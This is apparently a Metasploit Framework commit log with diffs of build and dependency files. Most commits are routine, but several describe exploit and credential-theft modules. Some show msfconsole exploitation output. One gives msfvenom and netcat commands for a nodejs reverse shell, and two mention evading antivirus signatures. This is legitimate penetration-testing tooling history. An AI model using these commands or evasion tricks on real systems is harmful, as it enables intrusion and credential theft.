Brent Cook a0e04760b5 rewrite timestomp command dispatcher to deal with file args properly 2017-08-28 08:25:42 -05:00
Marc Green d50c7d7f5c Output job id when jobifying exploit 2017-08-28 14:36:04 +02:00
Brent Cook 1e8edb377f Land #8873, cleanup enable_rdp, add error handling 2017-08-28 05:50:42 -05:00
Brent Cook d23edf5cd1 Land #8895, bump mettle, fix reverse_http/s shell command 2017-08-28 05:49:05 -05:00
Brent Cook 582b2e238e update mettle payload to 0.2.2, add background and single-thread http comms 2017-08-28 05:31:44 -05:00
Brent Cook 15ec40f5c6 update R cached sizes 2017-08-28 05:31:42 -05:00
Brent Cook b42a0759ce add missing specs 2017-08-28 05:30:07 -05:00
Brent Cook 406cbd0985 Land #8893, update meterpreter repo link 2017-08-27 21:31:34 -05:00
David Tomaschik ef6c20ce51 Update README
Meterpreter repo now redirects to metasploit-payloads.
2017-08-27 10:26:35 -07:00
h00die 598151c194 Land #8892 docs format fixup 2017-08-26 21:06:34 -04:00
h00die bd7ea1f90d more updates, 465 more pages to go 2017-08-26 21:01:10 -04:00
james 5bf1d916bc Fix uneven quotes in various documentation files
Uneven quotes lead to malformed markdown, which will not render as intended.
Even out the quotes in several files.
2017-08-26 19:12:48 -05:00
james f785fe63ad Grammar fix in buildmaster_login documentation 2017-08-26 18:35:13 -05:00
james 2e9d7cdf0a Documentation formatting fix for buildmaster_login 2017-08-26 18:23:00 -05:00
james 7dfde651ea Add login scanner module for Inedo BuildMaster
This module attempts to log into BuildMaster. BuildMaster is an application release automation tool.

More information about BuildMaster:
http://inedo.com/
2017-08-26 17:56:53 -05:00
Erik Lenoir a8067070f2 Fix typo 2017-08-26 17:52:11 +02:00
William Vu 924c3de9f3 Land #7382, BIND TSIG DoS 2017-08-26 10:42:35 -05:00
William Vu f9a2c3406f Clean up module 2017-08-26 10:41:10 -05:00
h00die 3420633f29 @NickTyrer corrected my correction 2017-08-26 08:43:10 -04:00
William Vu b797e96a19 Remove nil check because blank? handles it
The check used to be session_name.strip.empty?, but I forgot to remove
the nil case when I converted to blank?.
2017-08-25 14:11:59 -05:00
Metasploit 779b25bdf6 Bump version of framework to 4.16.3 2017-08-25 10:02:45 -07:00
Erik Lenoir 682851ac59 Edit doc 2017-08-25 18:28:24 +02:00
Erik Lenoir 801e3e2d68 Replace REXML with Nokogiri and try to cross id with mirror/repository tag 2017-08-25 18:28:09 +02:00
Jon P abaf80f3df jmartin improvements (iter on keys + save as credentials) 2017-08-25 18:15:24 +02:00
h00die 8f05f7eeb6 add tool to dump descriptions 2017-08-24 21:41:46 -04:00
h00die 32a4436ecd first round of spelling/grammar fixes 2017-08-24 21:38:44 -04:00
Jon Hart e4fc307ebb Add docs 2017-08-22 15:12:02 -07:00
Jon Hart 7b18c17445 Appease rubocop 2017-08-22 14:53:21 -07:00
Jon Hart 2969da3d70 Merge branch 'upstream-master' into feature/cisco-smi-scanner 2017-08-22 14:39:44 -07:00
Erik Lenoir be2739d335 Transform loots into creds 2017-08-22 11:57:51 +02:00
Brent Cook 29c48f9d8d cleanup accounts post API 2017-08-21 23:00:57 -05:00
Brent Cook e3a9ddfc22 fix retry case for acquiring security descriptor 2017-08-21 22:52:53 -05:00
Brent Cook 33f2ebc2aa code cleanup 2017-08-21 22:46:30 -05:00
Brent Cook 58e332cc7c only fail if the group sids fail to resolve and we actually have to add a user 2017-08-21 22:36:40 -05:00
Brent Cook 0d17e94f54 handle unmapped sids consistently 2017-08-21 22:36:26 -05:00
Erik Lenoir cde319a5ec Optim module and add doc 2017-08-18 19:30:41 +02:00
Erik Lenoir b529c3551c Remove unused variable 2017-08-18 19:00:32 +02:00
Brendan Coles 3fcd248d3a Add documentation 2017-08-17 09:51:09 +00:00
William Vu 5b7785438f Add session naming support to CommandDispatcher 2017-08-16 18:18:49 -05:00
William Vu 6eae3b3d4e Add session name output to ReadableText 2017-08-16 18:14:56 -05:00
Erik Lenoir 6ac8ed490b Add documentation file 2017-08-15 16:56:20 +02:00
Erik Lenoir b4055a8071 Rename command 2017-08-14 23:26:18 +02:00
Erik Lenoir 55db70ec3e Handle case when locate is not here by using enum_directories_map 2017-08-14 23:25:01 +02:00
Erik Lenoir 27822c2ccf Add Maven creds module 2017-08-14 14:59:59 +02:00
Patrick Thomas 25764397ba Update CachedSizes for changed nodejs payloads
Fixes test failures
2017-08-12 23:21:54 -07:00
Tim 7881a7ddc4 git submodule command exec 2017-08-13 11:47:44 +08:00
Patrick Thomas 437fe4b63a handle missing util.pump in nodejs shell payloads
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe. 

On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
    at Socket.<anonymous> ([stdin]:1:405)
    at Object.onceWrapper (events.js:293:19)
    at emitNone (events.js:86:13)
    at Socket.emit (events.js:188:7)
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```

With this change, bind and reverse tcp should be tolerant of both new and older versions.

*Reference*
https://github.com/nodejs/node/pull/2531

*Verification steps*

1. Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```

2. Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```

3. Confirm both old and new versions of node result in shell, not error.
2017-08-12 20:40:03 -07:00
Indranil Roy de02b52c8e Merge pull request #4 from rapid7/master
Merging master
2017-08-11 21:18:57 +05:30
Adam Cammack 1a9a942c1f Add external module template for capture servers 2017-08-07 13:31:46 -05:00
Martin Pizala 2383afd8dc Fix improved error handling 2017-08-04 23:42:44 +02:00
Martin Pizala b78cb12546 Ruby 2.2 support. See #8792 2017-08-02 18:06:48 +02:00
Professor-plum 234a95af78 Delete xtreme.rb
removed duplicate file from wrong location
2017-08-02 08:58:18 -06:00
Jon P adbeab81da Avoid exceptions 2017-08-02 15:03:36 +02:00
Professor-plum 055d64d32b Fixed to modules as suggested from upstream
fixed typo in xtreme.rb when communicating with C&C
removed self.class from options on all three modules
added line to log path where loot has been stored in xtreme.rb
2017-07-30 10:14:05 -06:00
Martin Pizala 60c3882b84 Improved error handling 2017-07-30 09:07:52 +02:00
Professor-plum 5c8a90a7be Add files via upload
This module is a Xtreme Rat Server Remote File Download Exploit that allows for blind file retrieval from the target

## Verification
Run the Xtreme Rat server on a target windows machine. 

- [ ] use exploit/windows/misc/xtreme
- [ ] set RHOST [ip of target]
- [ ] set TARGETFILE testfile.txt
- [ ] exploit

Sample output:
```
msf> use exploit/windows/misc/xtreme
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
TARGETFILE => testfile.txt
[*] 192.168.161.128:80 - Trying target Xtreme RAT 3.7...
```
2017-07-29 11:43:37 -06:00
Professor-plum 99546330f1 Added PlugX Controller Stack Overflow Module
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.

- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target

Sample output:
```
msf> use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check

[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
2017-07-29 10:36:42 -06:00
Professor-plum c336daec8d Added Gh0st Controller Buffer Overflow Module
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution 

## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.

- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit

Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 192.168.161.1:4444 
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
2017-07-29 10:21:05 -06:00
Jon P 85f48b96bb Fix syntax 2017-07-28 10:16:59 +02:00
Martin Pizala d7d64286e2 Add documentation for exploit module Rancher Server - Docker Exploit 2017-07-28 08:04:59 +02:00
Martin Pizala 6a20e1ac7d Add module Rancher Server - Docker Exploit 2017-07-28 08:04:21 +02:00
Ricardo Almeida 4845b4b1fa Orientdb 2.2.x RCE - Fix regular expression for version detection 2017-07-26 14:35:05 +01:00
Jon P 2e87a3d3f8 Multi Gather Docker Credentials Collection 2017-07-26 15:14:16 +02:00
Ricardo Almeida 30664924c8 Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes 2017-07-26 13:59:14 +01:00
Martin Pizala dd0c78484a Fix mistake 2017-07-26 02:17:51 +02:00
Martin Pizala 853ae9a6ce Add new reference 2017-07-26 02:16:56 +02:00
Martin Pizala cd418559bc Docker Daemon - Unprotected TCP Socket Exploit 2017-07-26 00:21:35 +02:00
Brendan Coles d66e8062e7 Add TeamTalk Gather Credentials auxiliary module 2017-07-24 14:24:38 +00:00
Ricardo Almeida fe5c6dc28f Orientdb 2.2.x RCE - Update documentation 2017-07-24 10:09:06 +01:00
Ricardo Almeida 6c22f785e9 Orientdb 2.2.x RCE - Fine tune vulnerable version detection; removed redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get; 2017-07-24 09:52:47 +01:00
RageLtMan e787d43344 Implement wrap_double_quotes in Msf PSH namespace
This is the Msf side of Rex Powershell #7
2017-07-22 02:40:15 -04:00
M4P0 c187f709dc Update geutebrueck_gcore_x64_rce_bo.rb
Review changes with msftidy.
2017-07-21 11:37:12 +02:00
Ricardo Almeida 00a817d228 Orientdb 2.2.x RCE - Add documentation 2017-07-20 09:03:26 +01:00
Ricardo Almeida f3f96babb9 Orientdb 2.2.x RCE - Changed the java_craft_runtime_exec function; Tested the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success 2017-07-19 10:46:10 +01:00
Ricardo Almeida 219987726f Orientdb 2.2.x RCE - Changed the CmdStager flavor to VBS script 2017-07-18 17:18:14 +01:00
Ricardo Almeida 5ca523e2ce Orientdb 2.2.x RCE - Add warning about windows 2017-07-18 17:11:54 +01:00
Ricardo Almeida af0a9c2f86 Orientdb 2.2.x RCE tidy stuff 2017-07-18 17:07:29 +01:00
Ricardo Almeida 99ba645034 Orientdb 2.2.x RCE 2017-07-18 16:53:44 +01:00
RageLtMan 33a06faadb Remove use_single_quotes option from Msf namespace
Internally wrapped lines of powershell built by :cmd_psh_payload
in the Rex namespace require being able to place wrapping quotes
in different logical places for :generate_psh_command_line and
:run_hidden_psh methods. Using single quotes in the Arguments
parameter of the hidden PSH runner and double quotes after the
-Command flag maintains allows us to wrap the outer command in
double quotes, while properly ecaping and wrapping the arguments
parameter for PSH execution in single quotes.

This isn't ideal, in a perfect world we'd be escaping all nested
quotes and escape chars of any type valid for PSH. However, that
would require more manual testing than anyone has time for (now).
2017-07-18 03:34:02 -04:00
RageLtMan 1a3fe02db1 Psexec via PSH related fixes
Implement removal of comspec and use of the noninteractive option
in powershell payloads.

This is the Msf side of #6 for rex-powershell.

Testing:
  In-house testing on 2016 standard edition and win10, 201707 revs.
2017-07-16 05:48:11 -04:00
Jon Hart e52e9c147d First commit for Cisco Smart Install Scanner 2017-07-12 19:12:06 -07:00
Brendan Coles f259682f12 Add documentation 2017-06-23 12:40:53 +00:00
Brendan Coles e20169c428 Disable VMware hint popups 2017-06-20 11:39:57 +00:00
Brendan Coles 668aa4edaf Use WfsDelay 2017-06-20 08:56:33 +00:00
Brendan Coles 4f6eab102f Code cleanup 2017-06-20 00:55:33 +00:00
Brendan Coles 1bd7a0ea2a Replace tabs with spaces 2017-06-20 00:06:50 +00:00
Brendan Coles cf8cf564b2 Add VMware Workstation ALSA Config File Privesc module 2017-06-18 11:16:25 +00:00
L3cr0f 23831e6df9 Upload requested changes 2017-06-18 11:34:58 +02:00
Harvey Phillips 4278339869 Added multi-file support for torrc and use locate instead of find when searching 2017-06-07 20:08:23 +01:00
Harvey Phillips 71fde14b6c Linux post module to grab TOR hidden service hostnames and private keys 2017-06-06 22:29:14 +01:00
Harvey Phillips f557aa3c9c Linux post module to search for and grab TOR hidden service configurations 2017-06-06 21:59:02 +01:00
L3cr0f 6a3fc618a4 Add bypassuac_injection_winsxs.rb module 2017-06-03 12:59:50 +02:00
Gabriel Follon 4e3d5fa8a3 Added docs 2017-05-16 13:06:09 +02:00
Gabriel Follon a8983c831d Updated links and authors 2017-05-04 18:25:45 -04:00
Gabriel Follon afe801b9e8 Updated target to 'universal' 2017-05-04 16:25:41 +02:00
Gabriel Follon 073cd59cd3 Added qmail_bash_env_exec exploit module, which exploit the ShellShock flaw via Qmail. 2017-05-04 15:44:18 +02:00
Jeff Tang 67086966ac Avoid calling unescape on nops directly
Using an intermediate variable will avoid triggering signatures
2017-02-23 18:19:16 -05:00
Jeff Tang 8ce10ac591 Avoid String.fromCharCode which gets detected 2017-02-22 14:13:18 -05:00
Maurice Popp d5fd620fbb Add files via upload 2017-02-14 11:21:36 +01:00
Ale c4c133dff8 Fix Web URL 2016-10-03 17:11:04 -03:00
Ale 066df5f1a9 Fix msftidy warnings 2016-09-30 14:19:43 -03:00
Ale bd96380d19 Fix in ScannerRecvWindow Declaration 2016-09-30 13:50:58 -03:00
Ale c699c7c506 Fixing MSF Code Style 2016-09-30 13:42:30 -03:00
Ale 143a4af73d DoS exploit for CVE-2016-2776 2016-09-29 22:14:13 -03:00
1384 changed files with 44695 additions and 5405 deletions
+1 -1
View File
@@ -34,7 +34,7 @@ config/database.yml
# target config file for testing
features/support/targets.yml
# simplecov coverage data
coverage
coverage/
doc/
external/source/meterpreter/java/bin
external/source/meterpreter/java/build
+1
View File
@@ -88,6 +88,7 @@ data/meterpreter/ext_server_pivot.*.dll
# local docker compose overrides
docker-compose.local*
.env
# Ignore python bytecode
*.pyc
+2
View File
@@ -1,6 +1,7 @@
acammack-r7 <acammack-r7@github> <acammack@aus-mbp-1099.aus.rapid7.com>
acammack-r7 <acammack-r7@github> <adam_cammack@rapid7.com>
acammack-r7 <acammack-r7@github> <Adam_Cammack@rapid7.com>
asoto-r7 <asoto-r7@github> <aaron_soto@rapid7.com>
bcook-r7 <bcook-r7@github> <bcook@rapid7.com>
bcook-r7 <bcook-r7@github> <busterb@gmail.com>
bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
@@ -30,6 +31,7 @@ lsanchez-r7 <lsanchez-r7@github> <lance.sanchez@gmail.com>
lsanchez-r7 <lsanchez-r7@github> <lance.sanchez@rapid7.com>
lsato-r7 <lsato-r7@github> <lsato@rapid7.com>
lvarela-r7 <lvarela-r7@github> <“leonardo_varela@rapid7.com”>
mkienow-r7 <mkienow-r7@github> <matthew_kienow@rapid7.com>
pbarry-r7 <pbarry-r7@github> <pearce_barry@rapid7.com>
pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
+1 -1
View File
@@ -1 +1 @@
2.4.1
2.4.3
+12 -5
View File
@@ -12,8 +12,8 @@ addons:
language: ruby
rvm:
- '2.2'
- '2.3.4'
- '2.4.1'
- '2.3.6'
- '2.4.3'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -21,9 +21,15 @@ env:
matrix:
fast_finish: true
jobs:
# build docker image
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
- env: CMD="docker-compose build" DOCKER="true"
# we do not need any setup
before_install: skip
install: skip
before_script: skip
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@@ -42,7 +48,8 @@ before_script:
- git diff --exit-code db/schema.rb
script:
- echo "${CMD}"
- bash -c "${CMD}"
# we need travis_wait because the Docker build job can take longer than 10 minutes
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
notifications:
irc: "irc.freenode.org#msfnotify"
+1 -1
View File
@@ -2,7 +2,7 @@
--exclude samples/
--exclude \.ut\.rb/
--exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
--files CONTRIBUTING.md,COPYING,LICENSE
app/**/*.rb
lib/msf/**/*.rb
lib/metasploit/**/*.rb
+4 -4
View File
@@ -45,8 +45,8 @@ and Metasploit's [Common Coding Mistakes].
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
* **Do** list [verification steps] so your code is testable.
* **Do** [reference associated issues] in your pull request description
* **Do** write [release notes] once a pull request is landed
* **Do** [reference associated issues] in your pull request description.
* **Do** write [release notes] once a pull request is landed.
* **Don't** leave your pull request description blank.
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
@@ -58,8 +58,8 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
* **Don't** include more than one module per pull request.
* **Do** include instructions on how to setup the vulnerable environment or software
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
* **Do** include instructions on how to setup the vulnerable environment or software.
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
+1 -1
View File
@@ -1,4 +1,4 @@
Copyright (C) 2006-2017, Rapid7, Inc.
Copyright (C) 2006-2018, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
+21 -15
View File
@@ -1,30 +1,36 @@
FROM ruby:2.4.1-alpine
MAINTAINER Rapid7
FROM ruby:2.4.3-alpine3.7
LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
ENV NMAP_PRIVILEGED=""
ENV BUNDLE_IGNORE_MESSAGES="true"
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
COPY lib $APP_HOME/lib
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
RUN apk update && \
apk add \
bash \
sqlite-libs \
nmap \
nmap-scripts \
nmap-nselibs \
postgresql-libs \
python \
python3 \
ncurses \
libcap \
su-exec \
&& apk add --virtual .ruby-builddeps \
autoconf \
bison \
build-base \
ruby-dev \
openssl-dev \
libressl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
@@ -36,22 +42,22 @@ RUN apk update && \
ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
USER $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
ADD ./ $APP_HOME
# we need this entrypoint to dynamically create a user
# matching the hosts UID and GID so we can mount something
# from the users home directory. If the IDs don't match
# it results in access denied errors. Once docker has
# a solution for this we can revert it back to normal
ENTRYPOINT ["docker/entrypoint.sh"]
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
+12 -2
View File
@@ -19,8 +19,18 @@ group :development do
# module documentation
gem 'octokit'
# Metasploit::Aggregator external session proxy
# Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
gem 'metasploit-aggregator' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'google-protobuf', '3.5.1' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'grpc', '1.8.3' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end
group :development, :test do
+130 -96
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.16.2)
metasploit-framework (4.16.43)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@@ -10,6 +10,7 @@ PATH
bcrypt_pbkdf
bit-struct
dnsruby
faker
filesize
jsobfu
json
@@ -17,9 +18,10 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.1)
metasploit-payloads (= 1.3.29)
metasploit_data_models
metasploit_payloads-mettle (= 0.2.0)
metasploit_payloads-mettle (= 0.3.7)
mqtt
msgpack
nessus_rest
net-ssh
@@ -36,8 +38,6 @@ PATH
pg (= 0.20.0)
railties
rb-readline
rbnacl (< 5.0.0)
rbnacl-libsodium
recog
redcarpet
rex-arch
@@ -49,7 +49,7 @@ PATH
rex-mime
rex-nop
rex-ole
rex-powershell (< 0.1.73)
rex-powershell (< 0.1.78)
rex-random_identifier
rex-registry
rex-rop_builder
@@ -58,8 +58,8 @@ PATH
rex-struct2
rex-text
rex-zip
robots
ruby_smb
ruby-macho
ruby_smb (= 0.0.18)
rubyntlm
rubyzip
sqlite3
@@ -73,72 +73,101 @@ PATH
GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.0.2)
actionpack (4.2.9)
actionview (= 4.2.9)
activesupport (= 4.2.9)
Ascii85 (1.0.3)
actionpack (4.2.10)
actionview (= 4.2.10)
activesupport (= 4.2.10)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.9)
activesupport (= 4.2.9)
actionview (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.9)
activesupport (= 4.2.9)
activemodel (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
activerecord (4.2.9)
activemodel (= 4.2.9)
activesupport (= 4.2.9)
activerecord (4.2.10)
activemodel (= 4.2.10)
activesupport (= 4.2.10)
arel (~> 6.0)
activesupport (4.2.9)
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.1)
public_suffix (~> 2.0, >= 2.0.2)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.4.0)
arel-helpers (2.6.1)
activerecord (>= 3.1.0, < 6)
backports (3.8.0)
backports (3.11.1)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.0)
bindata (2.4.2)
bit-struct (0.16)
builder (3.2.3)
coderay (1.1.1)
coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.3)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.8.0)
factory_girl (4.9.0)
activesupport (>= 3.0.0)
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
factory_girl_rails (4.9.0)
factory_girl (~> 4.9.0)
railties (>= 3.0.0)
faraday (0.13.1)
faker (1.8.7)
i18n (>= 0.7)
faraday (0.14.0)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
fivemat (1.3.6)
google-protobuf (3.5.1)
googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
googleauth (0.6.2)
faraday (~> 0.12)
jwt (>= 1.4, < 3.0)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.8.3)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
i18n (0.8.6)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
loofah (2.0.3)
jwt (2.1.0)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.2.0)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (1.0.0)
grpc
rex-arch
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.12)
metasploit-credential (2.0.13)
metasploit-concern
metasploit-model
metasploit_data_models
@@ -151,38 +180,41 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.1)
metasploit_data_models (2.0.15)
metasploit-payloads (1.3.29)
metasploit_data_models (2.0.16)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
metasploit-concern
metasploit-model
pg
pg (= 0.20.0)
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.2.0)
method_source (0.8.2)
mini_portile2 (2.2.0)
minitest (5.10.3)
msgpack (1.1.0)
metasploit_payloads-mettle (0.3.7)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.2)
multi_json (1.13.1)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (6.1.1)
nokogiri (1.8.0)
mini_portile2 (~> 2.2.0)
octokit (4.7.0)
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.2.0)
nokogiri (1.8.2)
mini_portile2 (~> 2.3.0)
octokit (4.8.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
pdf-reader (2.1.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
@@ -194,37 +226,32 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
pry (0.11.3)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (2.0.5)
rack (1.6.8)
method_source (~> 0.9.0)
public_suffix (3.0.2)
rack (1.6.9)
rack-test (0.6.3)
rack (>= 1.0)
rails-deprecated_sanitizer (1.0.3)
activesupport (>= 4.2.0.alpha)
rails-dom-testing (1.0.8)
activesupport (>= 4.2.0.beta, < 5.0)
rails-dom-testing (1.0.9)
activesupport (>= 4.2.0, < 5.0)
nokogiri (~> 1.6)
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
railties (4.2.9)
actionpack (= 4.2.9)
activesupport (= 4.2.9)
railties (4.2.10)
actionpack (= 4.2.10)
activesupport (= 4.2.10)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rake (12.3.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl (>= 3.0.1)
recog (2.1.12)
recog (2.1.18)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.11)
rex-arch (0.1.13)
rex-text
rex-bin_tools (0.1.4)
metasm
@@ -232,12 +259,12 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.12)
rex-core (0.1.13)
rex-encoder (0.1.4)
metasm
rex-arch
rex-text
rex-exploitation (0.1.14)
rex-exploitation (0.1.17)
jsobfu
metasm
rex-arch
@@ -250,51 +277,51 @@ GEM
rex-arch
rex-ole (0.1.6)
rex-text
rex-powershell (0.1.72)
rex-powershell (0.1.77)
rex-random_identifier
rex-text
rex-random_identifier (0.1.2)
rex-random_identifier (0.1.4)
rex-text
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
metasm
rex-core
rex-text
rex-socket (0.1.8)
rex-socket (0.1.10)
rex-core
rex-sslscan (0.1.5)
rex-core
rex-socket
rex-text
